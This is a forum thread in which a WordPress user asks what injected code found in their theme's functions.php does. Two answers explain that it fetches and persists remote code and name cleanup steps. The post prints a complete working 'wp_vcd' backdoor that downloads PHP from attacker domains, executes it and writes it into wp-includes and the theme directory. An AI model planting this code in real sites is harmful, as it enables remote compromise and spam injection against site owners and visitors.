What does this code do? (Injected code hacked)

This code below was been injected in my wordpress theme on functions.php Can someone explain me what does the code do? how that was been done?

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false  stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if( fwrite($handle, "?php\n" . $phpCode))
            {
            }
            else
            {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key='7af507a87318d795efbdb0a3a9028aad';
        if (($tmpcontent = @file_get_contents("http://www.linos.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


    elseif ($tmpcontent = @file_get_contents("http://www.linos.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif (($tmpcontent = @file_get_contents("http://www.linos.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    }





}
}

Topic hacks hacked functions Wordpress

Category Web

1
answered at

Hard to say with specifics 'how' the code got there. But I'd guess a security vulnerability in your theme, or a plugin.

In any case, it will add content to your page - spammy links, or perhaps even try to run code on the visitor's system. (As @mat mentioned in his answer.)

So, you need to get rid of it. Lots of googles on how to 'un-hack' a site. It takes some effort, but can be done, IMHO. I even wrote a process on how to do it, based on my experiences cleaning up a site: http://securitydawg.com/recovering-from-a-hacked-wordpress-site/ .

1
answered at

It gets code from a remote location (http://www.linos.cc/code.php) and stores it within a temporary file using sys_get_temp_dir() - http://php.net/manual/en/function.sys-get-temp-dir.php - and then creates a wp-tmp.php file with the before-mentioned code within your WordPress installation in the following locations:

/wp-includes/wp-tmp.php

and

/wp-content/themes/your-theme-name/wp-tmp.php

The code that's stored in this file (http://www.linos.cc/code.php) appears to append content to your WordPress sites pages using the the_content WordPress filter - https://codex.wordpress.org/Plugin_API/Filter_Reference/the_content.

Ps. The domain name linos.cc is registered with NameCheap - https://www.namecheap.com/ - so you could always report the domain to them as being used for abuse/malicious purposes. You can view details of the domain and get the domain registrars abuse reporting email here: http://whois.domaintools.com/linos.cc

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.